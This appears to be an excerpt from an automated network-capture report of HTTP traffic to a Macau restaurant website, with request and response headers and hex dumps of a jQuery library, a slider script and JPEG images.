79 70 65 3d 7b 6a 71 75 65 72 79 3a 6c 2c 63 6f 6e 73 74 72 75 63 74 6f 72 3a 6d 2c 73 65 6c 65 63 74 6f 72 3a 22 22 2c 6c 65 6e 67 74 68 3a 30 2c 74 6f 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 2e 63 61 6c 6c 28 74 68 69 73 29 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 61 3f 30 3e 61 3f 74 68 69 73 5b 61 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 61 5d 3a 64 2e 63 61 6c 6c 28 74 68 69 73 29 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 6d 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 61 29 3b 72 65 74 75 72 6e 20 62 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 62 2e 63 6f 6e 74 65 78 74 3d 74 68 69 73 2e 63 6f 6e 74 65 78 74 2c 62 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 6d 2e 65 61 63 68 28 74 68 69 73 2c 61 2c 62 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 6d 2e 6d 61 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 20 61 2e 63 61 6c 6c 28 62 2c 63 2c 62
                                                                                                                                                              Data Ascii: /*! jQuery v1.11.3 | (c) 2005, 2015 jQuery Foundation, Inc. | jquery.org/license */!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.3",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){return a.call(b,c,b
                                                                                                                                                              Mar 13, 2023 05:26:08.473458052 CET1038OUTGET /m/static/js/index.js HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:08.688131094 CET1111INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 9256
                                                                                                                                                              Content-Type: application/x-javascript
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:20:21 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "8877e7a8a7b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:14 GMT
                                                                                                                                                              Data Raw: 24 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 09 2f 2f e8 8e b7 e5 8f 96 e8 af ad e8 a8 80 e7 8a b6 e6 80 81 e5 80 bc 0d 0a 20 20 76 61 72 20 6c 61 6e 67 20 3d 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 6c 61 6e 67 22 29 3b 0d 0a 20 20 0d 0a 20 20 2f 2f e5 8a a8 e6 80 81 e8 8e b7 e5 8f 96 e8 ae be e5 a4 87 e5 ae bd e5 ba a6 e5 80 bc 0d 0a 20 20 76 61 72 20 64 65 76 69 63 65 57 69 64 74 68 20 3d 20 24 28 77 69 6e 64 6f 77 29 2e 77 69 64 74 68 28 29 3b 0d 0a 20 20 76 61 72 20 64 65 76 69 63 65 48 65 69 67 68 74 20 3d 20 24 28 77 69 6e 64 6f 77 29 2e 68 65 69 67 68 74 28 29 3b 0d 0a 20 20 24 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 22 72 65 73 69 7a 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 64 65 76 69 63 65 57 69 64 74 68 20 3d 20 24 28 77 69 6e 64 6f 77 29 2e 77 69 64 74 68 28 29 3b 0d 0a 20 20 20 20 64 65 76 69 63 65 48 65 69 67 68 74 20 3d 20 24 28 77 69 6e 64 6f 77 29 2e 68 65 69 67 68 74 28 29 3b 0d 0a 20 20 7d 29 3b 0d 0a 0d 0a 20 20 2f 2f e8 bd ae e6 92 ad e5 99 a8 e7 9b b8 e5 85 b3 e5 ae 9e e7 8e b0 e7 9a 84 e5 b0 81 e8 a3 85 ef bc 8c e8 bd ae e6 92 ad e5 a4 a7 e5 9b be e6 87 92 e5 8a a0 e8 bd bd ef bc 8c e7 a1 ae e4 bf 9d e9 a1 ba e5 88 a9 e8 bf 87 e6 b8 a1 e5 8a a8 e6 95 88 e5 ae 9e e7 8e b0 0d 0a 20 20 76 61 72 20 24 73 77 69 70 65 72 20 3d 20 24 28 22 2e 73 77 61 70 65 72 22 29 3b 20 20 0d 0a 20 20 76 61 72 20 24 73 77 61 70 65 72 49 6d 67 73 20 3d 20 24 28 22 2e 73 77 61 70 65 72 2d 69 6d 67 22 29 3b 0d 0a 20 20 76 61 72 20 24 73 77 61 70 65 72 49 6e 64 65 78 73 20 3d 20 24 28 22 2e 69 6e 64 65 78 73 22 29 3b 0d 0a 20 20 76 61 72 20 24 6d 79 75 73 65 73 20 3d 20 24 28 22 2e 6d 79 75 73 65 22 29 3b 0d 0a 20 20 76 61 72 20 24 73 77 69 70 65 72 49 63 6f 6e 20 3d 20 24 28 22 2e 73 77 69 70 65 72 2d 69 63 6f 6e 22 29 3b 0d 0a 20 20 76 61 72 20 24 75 70 65 72 49 6d 67 20 3d 20 24 28 22 2e 75 70 65 72 2d 69 6d 67 22 29 3b 0d 0a 20 20 76 61 72 20 24 62 6f 74 74 6f 6d 49 6d 67 20 3d 20 24 28 22 2e 62 6f 74 74 6f 6d 2d 69 6d 67 22 29 3b 0d 0a 20 20 2f 2f e5 88 9d e5 a7 8b e5 8c 96 e5 8a a8 e6 80 81 e7 9a 84 e5 8a a0 e8 bd bd e5 af b9 e5 ba 94 e7 9a 84 e8 bd ae e6 92 ad e5 a4 a7 e5 9b be ef bc 8c e9 87 87 e5 8f 96 e5 90 8c e6 ad a5 e5 8a a0 e8 bd bd ef bc 8c e6 9c 9f e6 9c 9b e6 9b b4 e5 bf ab e5 93 8d e5 ba 94 0d 0a 20 20 66 6f 72 28 76 61 72 20 69 3d 30 3b 20 69 3c 24 73 77 61 70 65 72 49 6d 67 73 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 7b 0d 0a 20 20 20 20 2f 2a 0d 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 69 29 7b 0d 0a 20 20 20 20 20 20 76 61 72 20 69 6d 67 61 20 3d 20 6e 65 77 20 49 6d 61 67 65 28 29 3b 0d 0a 20 20 20 20 20 20 69 6d 67 61 2e 73 72 63 20 3d 20 24 73 77 61 70 65 72 49 6d 67 73 2e 65 71 28 69 29 2e 61 74 74 72 28 22 62 67 5f 73 72 63 22 29 3b 0d 0a 20 20 20 20 20 20 24 28 69 6d 67 61 29 2e 6f 6e 65 28 22 6c 6f 61 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 20 20 20 20 24 73 77 61 70 65 72 49 6d 67 73 2e 65 71 28 69 29 2e 63 73 73 28 22 62 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 22 2c 22 75 72 6c 28 22 2b 69 6d 67 61 2e 73
                                                                                                                                                              Data Ascii: $(function() {// var lang = localStorage.getItem("lang"); // var deviceWidth = $(window).width(); var deviceHeight = $(window).height(); $(window).on("resize",function(){ deviceWidth = $(window).width(); deviceHeight = $(window).height(); }); // var $swiper = $(".swaper"); var $swaperImgs = $(".swaper-img"); var $swaperIndexs = $(".indexs"); var $myuses = $(".myuse"); var $swiperIcon = $(".swiper-icon"); var $uperImg = $(".uper-img"); var $bottomImg = $(".bottom-img"); // for(var i=0; i<$swaperImgs.length; i++){ /* (function(i){ var imga = new Image(); imga.src = $swaperImgs.eq(i).attr("bg_src"); $(imga).one("load",function(){ $swaperImgs.eq(i).css("backgroundImage","url("+imga.s
                                                                                                                                                              Mar 13, 2023 05:26:08.726516008 CET1144OUTGET /images/menu_bg.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:08.930743933 CET1211INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 340
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:25 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "7a4c72f8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:14 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 1c 00 1c 03 01 11 00 02 11 01 03 11 01 ff c4 00 54 00 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 04 03 07 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 05 08 10 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 22 11 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ef b6 f2 cb 80 58 16 05 82 6a 6a 29 44 0a 20 51 04 f4 d0 50 14 05 03 3d 2a 9a 03 40 68 1f ff d9
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobedT"?Xjj)D QP=*@h
                                                                                                                                                              Mar 13, 2023 05:26:09.049372911 CET1216OUTGET /images/menu05.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:09.256721973 CET1259INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 19377
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:25 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "e84d53f8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:14 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 12 0f 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 00 69 00 00 01 01 00 03 00 00 00 01 00 1c 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1e 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d2 87 69 00 04 00 00 00 01 00 00 00 e8 00 00 01 20 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 35 3a 32 36 20 31 36 3a 33 36 3a 31 34 00 00 00 00 04 90 00 00 07 00 00 00 04 30 32 32 31 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 00 69 a0 03 00 04 00 00 00 01 00 00 00 1c 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 6e 01 1b 00 05 00 00 00 01 00 00 01 76 01 28 00 03 00 00 00 01 00 02 00 00 02 01 00 04 00 00 00 01 00 00 01 7e 02 02 00 04 00 00 00 01 00 00 10 89 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 c4 00 00 00 88 76 75 65 64 00 00 03 4c 00 00 00 86 76 69 65 77 00 00 03 d4 00 00 00 24 6c 75 6d 69 00 00 03 f8 00 00 00 14 6d 65 61 73 00 00 04 0c 00 00 00 24 74 65 63 68 00 00 04 30 00 00 00 0c 72 54 52 43 00 00 04 3c 00 00 08 0c 67 54 52 43 00 00 04 3c 00 00 08 0c 62 54 52 43 00 00 04 3c 00 00 08 0c 74 65 78 74 00 00 00 00 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 38 20 48 65 77 6c 65 74 74 2d 50 61 63 6b 61 72 64 20 43 6f 6d 70 61 6e 79 00 00 64 65 73 63 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 f3 51 00 01 00 00 00 01 16 cc 58 59 5a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 64 65 73 63 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f
                                                                                                                                                              Data Ascii: ExifMM*i(12i ''Adobe Photoshop CS6 (Windows)2020:05:26 16:36:140221inv(~HHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmddvuedLview$lumimeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ QXYZ XYZ o8XYZ bXYZ $descIEC http:/
                                                                                                                                                              Mar 13, 2023 05:26:09.260015011 CET1278OUTGET /images/copyrightbg.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/main.css
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:09.472743988 CET1355INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 894
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:23 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "8ebe1ff7a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:14 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 2b 03 ca 03 01 11 00 02 11 01 03 11 01 ff c4 00 58 00 01 00 03 01 00 00 00 00 00 00 00 00 00 00 00 00 00 03 04 05 09 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 02 01 04 03 00 00 00 00 00 00 00 00 00 00 00 01 02 03 11 31 41 51 21 04 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ef 4e 6f 62 d7 99 ad 27 4a 47 5c 82 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 4c 79 6f 8e 75 ac f8 e6 bc 02 ff 00 d5 8b b9 db 5d b9 e8 19 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 ff d9
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed+X1AQ!?Nob'JG\Lyou]
                                                                                                                                                              Mar 13, 2023 05:26:09.515489101 CET1362OUTGET /images/indexpic03.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:09.720280886 CET1411INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 97469
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:24 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "c219bdf7a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:15 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 20 a5 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 00 a0 00 00 01 01 00 03 00 00 00 01 01 5e 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1e 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d2 87 69 00 04 00 00 00 01 00 00 00 e8 00 00 01 20 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 35 3a 32 38 20 31 32 3a 30 32 3a 33 39 00 00 00 00 04 90 00 00 07 00 00 00 04 30 32 32 31 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 00 a0 a0 03 00 04 00 00 00 01 00 00 01 5e 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 6e 01 1b 00 05 00 00 00 01 00 00 01 76 01 28 00 03 00 00 00 01 00 02 00 00 02 01 00 04 00 00 00 01 00 00 01 7e 02 02 00 04 00 00 00 01 00 00 1f 1f 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 c4 00 00 00 88 76 75 65 64 00 00 03 4c 00 00 00 86 76 69 65 77 00 00 03 d4 00 00 00 24 6c 75 6d 69 00 00 03 f8 00 00 00 14 6d 65 61 73 00 00 04 0c 00 00 00 24 74 65 63 68 00 00 04 30 00 00 00 0c 72 54 52 43 00 00 04 3c 00 00 08 0c 67 54 52 43 00 00 04 3c 00 00 08 0c 62 54 52 43 00 00 04 3c 00 00 08 0c 74 65 78 74 00 00 00 00 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 38 20 48 65 77 6c 65 74 74 2d 50 61 63 6b 61 72 64 20 43 6f 6d 70 61 6e 79 00 00 64 65 73 63 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 f3 51 00 01 00 00 00 01 16 cc 58 59 5a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 64 65 73 63 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f
